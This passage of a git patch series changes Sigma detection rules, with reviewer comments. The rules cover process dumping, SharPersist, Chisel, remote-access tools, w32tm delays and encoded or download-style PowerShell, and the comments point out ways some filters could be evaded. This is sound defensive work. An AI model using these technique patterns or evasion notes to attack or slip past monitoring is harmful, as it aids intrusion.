@@ -6,19 +6,23 @@ author: Florian Roth references: - https://twitter.com/SBousseaden/status/1410545674773467140 date: 2020/07/01 -modified: 2022/03/26 +modified: 2022/09/21 logsource: category: registry_set product: windows detection: selection: - EventType: SetValue + EventType: SetValue TargetObject|contains|all: - '\Control\Print\Environments\Windows x64\Drivers' - '\Manufacturer' Details: '(Empty)' filter_cutepdf: TargetObject|contains: '\CutePDF Writer v4.0\' + filter_vnc: + TargetObject|contains: + - '\VNC Printer (PS)\' + - '\VNC Printer (UD)\' condition: selection and not 1 of filter_* falsepositives: - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index ff88c034d..245de30dc 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -19,6 +19,6 @@ detection: condition: selection falsepositives: - Legitimate administrative action -level: medium +level: medium tags: - attack.defense_evasion From 54add1516734413698adb62171258065458f38f3 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:57:33 +0200 Subject: [PATCH 086/120] workflow: fix wrong filename --- .github/workflows/sigma-test.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index 60b6cdc96..5cf624347 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml 
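Review bot: `filter_vnc` excludes the driver purely by registry key name (`\VNC Printer (PS)\`, `\VNC Printer (UD)\`), and because the selection only requires an empty `Manufacturer`, a rogue x64 print driver registered under one of those names is silently excluded. That is a defensible trade-off for a medium rule but should be written down, e.g. a comment above the filter such as `# name-based exclusion; an attacker can reuse these driver names`, or an entry in `falsepositives`. If the legitimate writes in your telemetry always come from the spooler, pinning `Image` in the filter as well would cost nothing — verify against the FP events first.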
@@ -138,10 +138,10 @@ jobs: - uses: actions/checkout@v2 - name: Download evtx-sigma-checker run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker - - name: Download and extract Windows 2022 0 20348 Azure baseline + - name: Download and extract Windows 2022.0.20348 Azure baseline run: | wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz - tar xzf win2022-0-20348.tgz + tar xzf win2022-0-20348-azure.tgz - name: Remove deprecated rules run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v' - name: Check for Sigma matches in baseline From f940a43d8f0ef72ee9e4c1b73291a7481f6ae9b1 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:12:30 +0200 Subject: [PATCH 087/120] workflow: use correct rule title --- .github/workflows/known-FPs.csv | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index a22dafcd5..5b36cab65 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -38,4 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe -949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon +949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon From cc5cda0a22fea3d89550c013ee7533c562465268 Mon Sep 17 00:00:00 2001 
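Review bot: The corrected `tar xzf win2022-0-20348-azure.tgz` is fine, but the step just above downloads `evtx-sigma-checker`, an executable this job then runs, from a GitHub release with no integrity check — `$EVTX_BASELINE_VERSION` pins which release, not its contents. Anyone who can replace that release asset gets code execution in CI with the repository checkout in reach. Record the expected digests and verify before use, e.g. `echo "<sha256>  evtx-sigma-checker" | sha256sum -c -` after the wget (and likewise for the `.tgz`), or fetch the artifacts by a commit-pinned URL. The `jobs:` block this step belongs to starts outside the hunk.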
From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 14:10:50 +0200 Subject: [PATCH 088/120] fix: needs to be contains now --- .../registry_delete_removal_com_hijacking_registry_key.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index 71184d34b..3e97012a9 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -43,7 +43,7 @@ detection: filter_peazip: Image|contains: 'peazip' # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) - TargetObject|startswith: '\PeaZip.' + TargetObject|contains: '\PeaZip.' condition: selection and not 1 of filter_* falsepositives: - Unknown From 8e011540b0b4829266f2c98fbf9f7ad1a40c0c83 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 16:30:47 +0200 Subject: [PATCH 089/120] rule: createdump renamed --- ...c_creation_win_cmstp_com_object_access.yml | 4 +-- ...c_creation_win_susp_renamed_createdump.yml | 30 +++++++++++++++++++ 2 files changed, 32 insertions(+), 2 deletions(-) create mode 100644 rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml diff --git a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml index 36718bfa0..49f39268f 100644 --- a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml 
@@ -25,8 +25,8 @@ detection: selection: ParentImage|endswith: '\DllHost.exe' IntegrityLevel: - - 'High' - - 'System' + - 'High' + - 'System' ParentCommandLine|contains: - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml new file mode 100644 index 000000000..160414c51 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml @@ -0,0 +1,30 @@ +title: Renamed CreateDump Process Dump +id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e +description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory +status: experimental +references: + - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ + - https://twitter.com/bopin2020/status/1366400799199272960 +author: Florian Roth +date: 2022/09/20 +tags: + - attack.defense_evasion + - attack.t1036 + - attack.t1003.001 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: 'FX_VER_INTERNALNAME_STR' + selection_cli: + CommandLine|contains|all: + - ' -u ' # Short version of '--full' + - ' -f ' # Short version of '--name' + - '.dmp ' + filter: + Image|endswith: '\createdump.exe' + condition: 1 of selection* and not filter +falsepositives: + - Command lines that use the same flags +level: high From 61a4a48ac001424161cd6dd630c93f04ced77c73 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 18:02:42 +0200 Subject: [PATCH 090/120] fix: CommandLine field types --- .../proc_creation_win_process_dump_rundll32_comsvcs.yml | 2 +- .../process_creation/proc_creation_win_susp_sharpview.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
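Review bot: `selection_cli` requires the literal `'.dmp '` with a trailing space, so a command line where the dump path is the last token (`… -f C:\t\out.dmp`) or is quoted (`out.dmp"`) is presumably missed, and `' -u '`/`' -f '` do not cover the `--full`/`--name` long forms the comments mention. Consider `'.dmp'` without the trailing space and adding the long-form switches as alternatives. `OriginalFileName: 'FX_VER_INTERNALNAME_STR'` looks like an unreplaced .NET version-resource placeholder; if other .NET runtime binaries ship with the same placeholder they would match `selection` without hitting the `\createdump.exe` filter, so `falsepositives` should mention that possibility rather than only "Command lines that use the same flags". Minor: `date: 2022/09/20` predates the commit date.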
diff --git a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml index 4143a47ad..f8a26ecc7 100644 --- a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml +++ b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml @@ -33,7 +33,7 @@ detection: CommandLine|contains|all: - 'comsvcs' - 'full' - Commandline|contains: + CommandLine|contains: - '24 ' - '#24' - '#+24' diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml index e0074c19a..031873c26 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml @@ -15,7 +15,7 @@ detection: sharpview: OriginalFileName: SharpView.exe sharpview_methods: - Commandline|contains: + CommandLine|contains: - Get-DomainGPOUserLocalGroupMapping - Find-GPOLocation - Get-DomainGPOComputerLocalGroupMapping From 026844026f0ba7c22c4753f025921975d5d77aca Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 18:04:18 +0200 Subject: [PATCH 091/120] fix: condition in sharpersist rule --- .../process_creation/proc_creation_win_hack_sharpersist.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml index 02c36329a..06ed87af5 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml @@ -36,7 +36,7 @@ detection: CommandLine|contains|all: - ' -t schtask -c ' - ' -m add' - condition: selection + condition: 1 of selection* falsepositives: - Unknown level: high 
From 2ffca9c8da4bb8ca78002ed4af69165677f09614 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 18:08:24 +0200 Subject: [PATCH 092/120] fix: condition --- .../process_creation/proc_creation_win_sharp_chisel_usage.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml index 7d472e237..adce54a59 100644 --- a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml @@ -33,7 +33,7 @@ detection: # - ' --reverse' # - ' r:' # - ':127.0.0.1:' - condition: 1 of selection + condition: 1 of selection* falsepositives: - Some false positives may occure with other tools with similar commandlines level: high From eeca6a898b641c25af40cbcef1f8aaaf9ff3dabe Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 21 Sep 2022 18:16:02 +0200 Subject: [PATCH 093/120] fix: mitre attack tags --- .../process_creation/proc_creation_win_hack_sharpersist.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml index 06ed87af5..51ca980d6 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml @@ -13,8 +13,6 @@ logsource: tags: - attack.persistence - attack.t1053 - - attack.t1060 - - attack.t1050 detection: selection1: Image|endswith: '\SharPersist.exe' From 6c70c6d35a695229c80ef418cff3c57ea21f13c9 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 22 Sep 2022 17:42:27 +0200 Subject: [PATCH 094/120] Update win_impacket_psexec.yml --- rules/windows/builtin/security/win_impacket_psexec.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
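Review bot: The deprecated `attack.t1060` and `attack.t1050` tags are removed but not replaced with their successors, so the rule loses its persistence sub-technique mapping. Those IDs correspond today to Registry Run Keys (`attack.t1547.001`) and New Service (`attack.t1543.003`); the scheduled-task selection visible in the earlier hunk (`-t schtask`) is covered by `attack.t1053` and could be narrowed to `attack.t1053.005`. Add the successor tags alongside `attack.persistence` if the rule's other selections indeed cover registry and service methods — those selection blocks are outside this hunk.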
diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index ff7856880..434d38015 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml @@ -6,7 +6,7 @@ author: Bhabesh Raj references: - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html date: 2020/12/14 -modified: 2022/08/11 +modified: 2022/09/22 logsource: product: windows service: security From 24e87d0f341e43b69a0258a12dd22f19d7740f35 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Thu, 22 Sep 2022 17:42:54 +0100 Subject: [PATCH 095/120] fix: Rename Linux process creation rule to use established pattern One rule had filename beginning 'prox' rather than 'proc'. Signed-off-by: Rachel Rice --- ...removal.yml => proc_creation_lnx_chattr_immutable_removal.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/linux/process_creation/{prox_creation_lnx_chattr_immutable_removal.yml => proc_creation_lnx_chattr_immutable_removal.yml} (100%) diff --git a/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml similarity index 100% rename from rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml rename to rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml From 6497cb7745c44b523cfc367f1b533201b3ec422f Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Fri, 23 Sep 2022 03:37:00 +0900 Subject: [PATCH 096/120] Keep at level: low --- .../builtin/application/win_builtin_remove_application.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 1a497e2b6..0106730e8 100644 
--- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -17,7 +17,7 @@ detection: condition: selection falsepositives: - Unknown -level: informational +level: low tags: - attack.impact - attack.t1489 From ac9b12b6bb973bf9c2b2a72bfec3590c64692e6e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 23 Sep 2022 07:14:31 +0200 Subject: [PATCH 097/120] Update win_builtin_remove_application.yml --- .../builtin/application/win_builtin_remove_application.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 0106730e8..e9e4cc9d5 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -17,6 +17,7 @@ detection: condition: selection falsepositives: - Unknown +#Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview level: low tags: - attack.impact From 9b0189b5f7ea0004614cbb3a80674bab5199a538 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 25 Sep 2022 16:14:21 +0200 Subject: [PATCH 098/120] Add redcannary rules --- .../proc_creation_win_netsupport.yml | 27 +++++++++++++++++ .../proc_creation_win_ultraviewer.yml | 26 ++++++++++++++++ .../proc_creation_win_w32tm.yml | 30 +++++++++++++++++++ 3 files changed, 83 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_netsupport.yml create mode 100644 rules/windows/process_creation/proc_creation_win_ultraviewer.yml create mode 100644 rules/windows/process_creation/proc_creation_win_w32tm.yml 
diff --git a/rules/windows/process_creation/proc_creation_win_netsupport.yml b/rules/windows/process_creation/proc_creation_win_netsupport.yml new file mode 100644 index 000000000..d9d99094f --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_netsupport.yml @@ -0,0 +1,27 @@ +title: Use of NetSupport Remote Access Software +id: 758ff488-18d5-4cbe-8ec4-02b6285a434f +status: experimental +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection: + - Description: NetSupport Client Configurator + - Product: NetSupport Remote Control + - Company: NetSupport Ltd + - OriginalFileName: PCICFGUI.EXE + condition: selection +falsepositives: + - Legitimate use +level: medium +tags: + - attack.command_and_control + - attack.t1219 diff --git a/rules/windows/process_creation/proc_creation_win_ultraviewer.yml b/rules/windows/process_creation/proc_creation_win_ultraviewer.yml new file mode 100644 index 000000000..f3781c979 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_ultraviewer.yml 
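Review bot: `Company: NetSupport Ltd` as a standalone alternative in `selection` fires on every binary from that vendor, not only the remote-control client, so environments with other NetSupport products will see steady noise at `level: medium`. Either drop the `Company` alternative or combine it with a `Product`/`OriginalFileName` constraint. The `description` is the generic T1219 paragraph and never says which binaries are matched; a first line such as `Detects execution of NetSupport remote-control components by their version-resource fields (Description/Product/Company/OriginalFileName).` would help triage, and `falsepositives` should name the vendor-wide match if it is kept.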
@@ -0,0 +1,26 @@ +title: Use of UltraViewer Remote Access Software +id: 88656cec-6c3b-487c-82c0-f73ebb805503 +status: experimental +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection: + - Product: UltraViewer + - Company: DucFabulous Co,ltd + - OriginalFileName: UltraViewer_Desktop.exe + condition: selection +falsepositives: + - Legitimate use +level: medium +tags: + - attack.command_and_control + - attack.t1219 diff --git a/rules/windows/process_creation/proc_creation_win_w32tm.yml b/rules/windows/process_creation/proc_creation_win_w32tm.yml new file mode 100644 index 000000000..82bcbcc13 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_w32tm.yml 
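Review bot: The `description` is the generic T1219 paragraph copied verbatim and never mentions UltraViewer, so an analyst reading the alert does not learn what the rule detects or why `DucFabulous Co,ltd` matters (presumably UltraViewer's vendor string — confirm). Suggest a first line such as `Detects execution of the UltraViewer remote access client by its version-resource fields (Product/Company/OriginalFileName).` `Company: DucFabulous Co,ltd` alone also matches any binary from that vendor, which is broader than the `Product` match; if that is intended, say so in `falsepositives`.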
@@ -0,0 +1,30 @@ +title: Use of W32tm as Timer +id: 6da2c9f5-7c53-401b-aacb-92c040ce1215 +status: experimental +description: When configured with suitable command line arguments,w32tm can act as a delay mechanism +references: + - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md + - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection_w32tm: + - Image|endswith: '\w32tm.exe' + - OriginalFileName: 'w32time.dll' + selection_cmd: + CommandLine|contains|all: + - '/stripchart' + - '/computer:' + - '/period:' + - '/dataonly' + - '/samples:' + condition: all of selection_* +falsepositives: + - Legitimate use +level: medium +tags: + - attack.discovery + - attack.t1124 From e1375467c59a5085d1505b4aa4f528a5c3468e6a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 26 Sep 2022 23:52:48 +0200 Subject: [PATCH 099/120] fix: FPs with Azure hosts --- .../powershell_script/posh_ps_send_mailmessage.yml | 10 ++++++---- .../powershell_script/posh_ps_web_request.yml | 4 +++- .../proc_creation_win_susp_powershell_cmd_patterns.yml | 8 ++++++-- .../proc_creation_win_susp_powershell_encode.yml | 8 ++++++-- 4 files changed, 21 insertions(+), 9 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml b/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml index f450b9dee..d7f20b484 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml 
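Review bot: `selection_cmd` demands all five switches including `/dataonly` and `/samples:`, which reproduces the atomic test's exact command line, so an actor who omits `/dataonly` (it only trims output) or relies on `/period:` without `/samples:` still gets the delay but is not detected. Consider requiring only the switches that make w32tm usable as a timer — `/stripchart`, `/computer:` and `/period:` — and treating the others as optional. The description calls this a delay mechanism, which is time-based evasion (T1497.003) rather than `attack.t1124` system-time discovery; either add `attack.defense_evasion`/`attack.t1497.003` or reword the description. `OriginalFileName: 'w32time.dll'` for an `.exe` is surprising enough to deserve a comment stating it was checked against the binary's version resource.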
@@ -9,15 +9,17 @@ references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2 - https://www.ietf.org/rfc/rfc2821.txt author: frack113 -date: 2022/01/07 +date: 2022/09/26 logsource: product: windows category: ps_script definition: Script block logging must be enabled detection: - selection_cmdlet: - ScriptBlockText|contains: Send-MailMessage - condition: selection_cmdlet + selection: + ScriptBlockText|contains: 'Send-MailMessage' + filter: + ScriptBlockText|contains: 'CmdletsToExport' + condition: selection and not filter falsepositives: - Legitimate script level: medium diff --git a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml index e344a07ee..6ead22b8a 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml @@ -10,7 +10,7 @@ references: - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell author: James Pemberton / @4A616D6573 date: 2019/10/24 -modified: 2021/10/16 +modified: 2022/09/26 tags: - attack.execution - attack.t1059.001 @@ -27,6 +27,8 @@ detection: - 'curl ' - 'Net.WebClient' - 'Start-BitsTransfer' + filter: + Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' condition: selection falsepositives: - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml index 115d72cea..d1a4a1c0e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml 
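Review bot: The hunk overwrites `date:` (creation date, 2022/01/07 → 2022/09/26) instead of adding `modified: 2022/09/26`, which is how every other rule touched in this series records a change; restore `date: 2022/01/07` and add the `modified` line. The new `filter` on `ScriptBlockText|contains: 'CmdletsToExport'` is a content-based exclusion: any script that embeds that token escapes the `Send-MailMessage` detection, and adding it costs an attacker nothing. If the false positive is module manifests being logged, anchor on the source instead, e.g. `Path|endswith: '.psd1'`, after verifying that `Path` is populated for those script blocks.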
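Review bot: The added `filter` is never applied — `condition: selection` is unchanged — so the Guest Configuration exclusion this commit intends to add has no effect and the Azure false positives will persist. Change it to `condition: selection and not filter`. Also, `Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'` excludes every script under that tree regardless of content; presumably that directory is not user-writable, but a `falsepositives` entry naming it would make the exclusion reviewable.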
@@ -6,7 +6,7 @@ author: Florian Roth references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ date: 2022/05/24 -modified: 2022/07/14 +modified: 2022/09/26 tags: - attack.execution - attack.t1059.001 @@ -32,7 +32,11 @@ detection: - ' IAB' - ' PAA' - ' aQBlAHgA' - condition: encoded and selection + filter: + ParentImage|contains: + - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + - '\gc_worker.exe' + condition: encoded and selection and not filter falsepositives: - Other tools that work with encoded scripts in the command line instead of script files level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml index f6ab8837d..42a2a1995 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml @@ -8,7 +8,7 @@ references: - https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/ - https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/ date: 2022/01/02 -modified: 2022/07/14 +modified: 2022/09/26 logsource: category: process_creation product: windows @@ -25,7 +25,11 @@ detection: - ' -ec ' filter: CommandLine|contains: ' -Encoding ' - condition: selection and not filter + filter_azure: + ParentImage|contains: + - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + - '\gc_worker.exe' + condition: selection and not 1 of filter* falsepositives: - Unknown level: medium From 0503e2b8f7da878c145a6f7cf6dafd8b02c5bd99 Mon Sep 17 00:00:00 2001 
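Review bot: The second `ParentImage|contains` entry, `'\gc_worker.exe'`, is unanchored, so any encoded PowerShell whose parent binary is merely named `gc_worker.exe` — at any path — is excluded from this high-level rule, and renaming a launcher costs an attacker nothing. If `gc_worker.exe` lives under the Guest Configuration plugin directory, the first entry already covers it and the second can be dropped; otherwise pin it to its full expected path rather than a suffix match. The `encoded` selection this filter applies to starts outside the hunk.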
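Review bot: `filter_azure` repeats the unanchored `'\gc_worker.exe'` suffix match as a parent exclusion, so a renamed launcher bypasses the `-enc`/`-ec` detection here as well. Since the `C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\` prefix is already listed, drop the bare executable name or give it its full expected path. The `condition: selection and not 1 of filter*` change is correct and keeps the pre-existing `filter` (the `-Encoding` exclusion) active.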
From: Florian Roth Date: Tue, 27 Sep 2022 00:17:53 +0200 Subject: [PATCH 100/120] fix: FPs on Azure --- .../image_load_side_load_from_non_system_location.yml | 8 +++++--- .../proc_creation_win_malware_emotet.yml | 9 +++++++-- .../proc_creation_win_susp_system_user_anomaly.yml | 4 +++- 3 files changed, 15 insertions(+), 6 deletions(-) diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index acbbd1f87..37c942bac 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -8,7 +8,7 @@ references: - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll author: Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex) date: 2022/08/14 -modified: 2022/09/11 +modified: 2022/09/27 tags: - attack.defense_evasion - attack.persistence @@ -419,8 +419,10 @@ detection: filter_systemp: ImageLoaded|startswith: 'C:\Windows\SystemTemp\' filter_appvpolicy: - ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll - Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe + ImageLoaded: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll' + Image: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe' + filter_azure: + ImageLoaded|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' condition: selection and not 1 of filter_* falsepositives: - Legitimate applications loading their own versions of the DLLs mentioned in this rule diff --git a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml index c0ba595f8..64e40c05f 100644 
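Review bot: `filter_azure` excludes any DLL loaded from `C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\` by any process, with no `Image` constraint, whereas the neighbouring `filter_appvpolicy` pins both `Image` and `ImageLoaded`. If an attacker can write into that plugin directory (its ACL is not established here), placing one of the rule's side-load DLL names there would be filtered out. Consider pinning the loading process too, e.g. `Image|startswith` on the same directory, if the legitimate loads all originate from the plugin's own binaries — check the FP events. The `selection` block starts outside the hunk.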
